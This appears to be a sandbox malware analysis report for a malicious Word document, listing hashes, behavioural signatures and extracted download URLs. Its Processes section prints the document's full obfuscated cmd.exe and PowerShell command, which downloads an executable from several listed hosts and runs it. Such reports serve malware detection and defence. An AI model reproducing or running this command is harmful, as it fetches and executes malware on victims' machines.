Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
29/08/2024, 09:23
Behavioral task
behavioral1
Sample
c88dd06b1f25fd0fc256ed2d874c6513_JaffaCakes118.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
c88dd06b1f25fd0fc256ed2d874c6513_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
c88dd06b1f25fd0fc256ed2d874c6513_JaffaCakes118.doc
-
Size
154KB
-
MD5
c88dd06b1f25fd0fc256ed2d874c6513
-
SHA1
06df3a61cf1ba9f801f0c0e37ea3bc5e11f6a47d
-
SHA256
496f28c45a056ece930233ef9c15f5e227d9939706d8ff9868f8928cfd600149
-
SHA512
b0770e2fe4ecb7adb61cbec8c82a18e6301718294b266ff5a09ec75cfe8c9719da169617efd0f7ca8ae9a176fa1e709e9bfb26deeee6b006c8fac5b4d52aef2d
-
SSDEEP
3072:WgIg4KfNmKdXKDAfCzDSrvFf9kIy1GOsc3Uv6K:WVqNVXKDACzDSrNU4OscEv
Malware Config
Extracted
http://h-g.at/ILM7q/
http://ibchs.com/ah1B/
http://hillmanmaritime.com/hcBm/
http://body4art.de/v0tMR0a/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3028 868 Cmd.exe 83 -
Blocklisted process makes network request 4 IoCs
flow pid Process 23 4760 powershell.exe 26 4760 powershell.exe 35 4760 powershell.exe 38 4760 powershell.exe -
pid Process 4760 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 3028 Cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 868 WINWORD.EXE 868 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4760 powershell.exe 4760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4760 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 868 WINWORD.EXE 868 WINWORD.EXE 868 WINWORD.EXE 868 WINWORD.EXE 868 WINWORD.EXE 868 WINWORD.EXE 868 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 868 wrote to memory of 3028 868 WINWORD.EXE 86 PID 868 wrote to memory of 3028 868 WINWORD.EXE 86 PID 3028 wrote to memory of 4760 3028 Cmd.exe 89 PID 3028 wrote to memory of 4760 3028 Cmd.exe 89
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c88dd06b1f25fd0fc256ed2d874c6513_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:868 -
C:\Windows\SYSTEM32\Cmd.exeCmd NjWrAVqAJ wtALGSuUvNbSvGOdlJzbwIS RqzaWaYjozknad & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %dzorojvQztjwdsv%=VidHjtjiE&&set %qzOaJjz%=p&&set %DSBvnYXniSDYD%=o^w&&set %hszGzFrskUajIpH%=bbfaFKFMVdGOJ&&set %SSKlzCXiGJEiUo%=!%qzOaJjz%!&&set %JjSFnHnwJAnrDsY%=hNsVRFSAHw&&set %zbFMQii%=e^r&&set %awidvwYlQzbApG%=!%DSBvnYXniSDYD%!&&set %VwYISNiEw%=s&&set %WmnkTzdjbkIiViT%=RbrjCShqoQNtrE&&set %ZcITwJNst%=he&&set %TtwiBlBmU%=ll&&!%SSKlzCXiGJEiUo%!!%awidvwYlQzbApG%!!%zbFMQii%!!%VwYISNiEw%!!%ZcITwJNst%!!%TtwiBlBmU%! "(' &( j4vPSHOMe[4]+j4vPShOme[34]+QjdxQjd) ( (QjdGIUnsQjd'+'+QjdadasdQjd+Qjd Qjd+Qjd= &Qjd+Qjd'+'(SGQjd+QjdxnSGx+SGxeQjd+QjdSGQjd+QjdxQjd+Qjd+SQjd+QjdGxw-objeQjd+QjdcSGx+SGxtSQjd+QjdGQjd+QjdxQjd+Qjd) random;GIUYY'+'U Qjd+Qjd= .(SGxneSGx+SGxwSGQjd+Qj'+'dxQjd+Qjd+SGxQjd+Qjd-obQjd+QjdjeQjd+QjdctSGx) SQjd+Qjdystem.NeQjd+Qjdt.WeQjd+QjdbQjd'+'+Q'+'jdClien'+'tQjd+Q'+'jd;GIQjd+QjdUNSQjd+QjdBQjd+Qjd = GQjd+QjdIUnsadasdQjd+Qjd.Qjd+Qjdnext(1'+'Qjd+Qjd0000, 28'+'213Qjd+Qjd3)Qjd+Qjd'+';GIUADCQjd+QjdXQjd+Qjd Qjd+Qjd= SQjd+QjdGx http:Qjd+Qjd/'+'/grazQjd+Q'+'jdiellacintrQjd+Qjda.com.bQjd+QjdrQjd+Qjd/aQjd+QjdkQjd+QjddQjd+QjdpqQjd+Qjd9Qjd+Qjd6Qjd+Qjd/@httQjd+Qjdp://h-g.at/ILM7q/@Qjd+QjdhtQjd+Qjdtp'+'://Qjd+Qj'+'dibchs.Qjd+Qjdcom/Qjd+Qjdah1B/@htQjd+QjdtpQjd+Qjd:/'+'/hilQjd+QjdlQjd+QjdmanmariQjd+Qjdtime.com/hc'+'BmQjd+Qjd/@Qjd+QjdhttQjd+Qjdp://bodyQjd+Qjd4art.dQjd+Qjde/vQjd+Q'+'jd0tQjd+QjdMR0a/SGx.Qjd+QjdSplit(SQjd+QjdGx@SGQjd+Qjdx)Qjd+Qjd;GQjd+QjdIUS'+'DQjd+QjdC Qjd+Qjd= GQjd+QjdIQjd+QjdUQjd+QjdeQjd+QjdnQjd+Qjdv:Qjd+QjdpuQjd+QjdbQjd+QjdlicQjd+'+'Qjd Qjd+Qjd+Qjd+Qjd SGQjd+Qjdx6SQS'+'Gx + GIQjd+QjdUNSQjd+QjdB + (Qjd+QjdSGxQjd+Qjd.Qjd+QjdexSGx+SGxeSGx);foreaQjd'+'+QjdchQjd+Qjd(GI'+'Uasfc in GIUADCX)Qjd+Qjd{tQjd+QjdrQj'+'d+Qjdy{Qjd+QjdGIQjd+QjdUQjd+QjdYQjd+QjdYU.Qjd+Qjds40DoMmQjd'+'+QjdjWn'+'Qjd+QjdlMmjQjd+QjdOaQjd+QjddFIMmQjd+QjdjQ'+'jd+Qjdles40(GIUasfQjd+QjdcQjd+Qjd.sQjd+Qjd40Qjd+QjdTQjd+QjdoStrMmQjd+QjdjiMmjNgsQjd+Qjd4Qjd+Qjd0(), GQjd+QjdIUS'+'DQjd+Qjd'+'C);&(SGxInvoSGQjd+Qjdx+SQjd+Qjd'+'GxkSQjd+QjdGx+SGxe-IQjd+Qjd'+'temSGx)(GQjd+QjdIUSDC);Qjd+QjdbreQjd+Qjdak;}caQjd+QjdtchQjd+Qjd{}}Qjd).rePlaCe(QjdMmjQjd,QjdpQeQjd).rePlaCe(([cHar]83+[cHa'+'r]71+[cHar]120),[sTRING'+'][cHar]39).rePlaCe(([cHar]115+[cHar]52+[cHar]48),[sTRING][cHar]34).rePlaCe(Q'+'jd6SQQjd,[sTRING][cHar]92).rePlaCe(QjdGIUQjd,[sTRING][cHar]36) ) ').RepLAcE(([ChAr]106+[ChAr]52+[ChAr]118),[STrIng][ChAr]36).RepLAcE(([ChAr]112+[ChAr]81+[ChAr]101),[STrIng][ChAr]96).RepLAcE('Qjd',[STrIng][ChAr]39)|& ( $sHeLLiD[1]+$ShELlId[13]+'x')2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "(' &( j4vPSHOMe[4]+j4vPShOme[34]+QjdxQjd) ( (QjdGIUnsQjd'+'+QjdadasdQjd+Qjd Qjd+Qjd= &Qjd+Qjd'+'(SGQjd+QjdxnSGx+SGxeQjd+QjdSGQjd+QjdxQjd+Qjd+SQjd+QjdGxw-objeQjd+QjdcSGx+SGxtSQjd+QjdGQjd+QjdxQjd+Qjd) random;GIUYY'+'U Qjd+Qjd= .(SGxneSGx+SGxwSGQjd+Qj'+'dxQjd+Qjd+SGxQjd+Qjd-obQjd+QjdjeQjd+QjdctSGx) SQjd+Qjdystem.NeQjd+Qjdt.WeQjd+QjdbQjd'+'+Q'+'jdClien'+'tQjd+Q'+'jd;GIQjd+QjdUNSQjd+QjdBQjd+Qjd = GQjd+QjdIUnsadasdQjd+Qjd.Qjd+Qjdnext(1'+'Qjd+Qjd0000, 28'+'213Qjd+Qjd3)Qjd+Qjd'+';GIUADCQjd+QjdXQjd+Qjd Qjd+Qjd= SQjd+QjdGx http:Qjd+Qjd/'+'/grazQjd+Q'+'jdiellacintrQjd+Qjda.com.bQjd+QjdrQjd+Qjd/aQjd+QjdkQjd+QjddQjd+QjdpqQjd+Qjd9Qjd+Qjd6Qjd+Qjd/@httQjd+Qjdp://h-g.at/ILM7q/@Qjd+QjdhtQjd+Qjdtp'+'://Qjd+Qj'+'dibchs.Qjd+Qjdcom/Qjd+Qjdah1B/@htQjd+QjdtpQjd+Qjd:/'+'/hilQjd+QjdlQjd+QjdmanmariQjd+Qjdtime.com/hc'+'BmQjd+Qjd/@Qjd+QjdhttQjd+Qjdp://bodyQjd+Qjd4art.dQjd+Qjde/vQjd+Q'+'jd0tQjd+QjdMR0a/SGx.Qjd+QjdSplit(SQjd+QjdGx@SGQjd+Qjdx)Qjd+Qjd;GQjd+QjdIUS'+'DQjd+QjdC Qjd+Qjd= GQjd+QjdIQjd+QjdUQjd+QjdeQjd+QjdnQjd+Qjdv:Qjd+QjdpuQjd+QjdbQjd+QjdlicQjd+'+'Qjd Qjd+Qjd+Qjd+Qjd SGQjd+Qjdx6SQS'+'Gx + GIQjd+QjdUNSQjd+QjdB + (Qjd+QjdSGxQjd+Qjd.Qjd+QjdexSGx+SGxeSGx);foreaQjd'+'+QjdchQjd+Qjd(GI'+'Uasfc in GIUADCX)Qjd+Qjd{tQjd+QjdrQj'+'d+Qjdy{Qjd+QjdGIQjd+QjdUQjd+QjdYQjd+QjdYU.Qjd+Qjds40DoMmQjd'+'+QjdjWn'+'Qjd+QjdlMmjQjd+QjdOaQjd+QjddFIMmQjd+QjdjQ'+'jd+Qjdles40(GIUasfQjd+QjdcQjd+Qjd.sQjd+Qjd40Qjd+QjdTQjd+QjdoStrMmQjd+QjdjiMmjNgsQjd+Qjd4Qjd+Qjd0(), GQjd+QjdIUS'+'DQjd+Qjd'+'C);&(SGxInvoSGQjd+Qjdx+SQjd+Qjd'+'GxkSQjd+QjdGx+SGxe-IQjd+Qjd'+'temSGx)(GQjd+QjdIUSDC);Qjd+QjdbreQjd+Qjdak;}caQjd+QjdtchQjd+Qjd{}}Qjd).rePlaCe(QjdMmjQjd,QjdpQeQjd).rePlaCe(([cHar]83+[cHa'+'r]71+[cHar]120),[sTRING'+'][cHar]39).rePlaCe(([cHar]115+[cHar]52+[cHar]48),[sTRING][cHar]34).rePlaCe(Q'+'jd6SQQjd,[sTRING][cHar]92).rePlaCe(QjdGIUQjd,[sTRING][cHar]36) ) ').RepLAcE(([ChAr]106+[ChAr]52+[ChAr]118),[STrIng][ChAr]36).RepLAcE(([ChAr]112+[ChAr]81+[ChAr]101),[STrIng][ChAr]96).RepLAcE('Qjd',[STrIng][ChAr]39)|& ( $sHeLLiD[1]+$ShELlId[13]+'x')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
176B
MD54c2fa063f933e154d100c730c74bdc9f
SHA1da6c043b7925a94724e470405e010fa854579597
SHA25630129dab19513d576c5bbb3774f8b63caf6fca402d8f5d4471b767d943248053
SHA51293df313567db9a4e35525674c31b974658fdf03da849b93f70841532110d3aee3a5ebf4caade6790312cc6afc94a07510bb914b92a611686d4da48b82c60cce6
-
Filesize
114B
MD5e89f75f918dbdcee28604d4e09dd71d7
SHA1f9d9055e9878723a12063b47d4a1a5f58c3eb1e9
SHA2566dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023
SHA5128df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0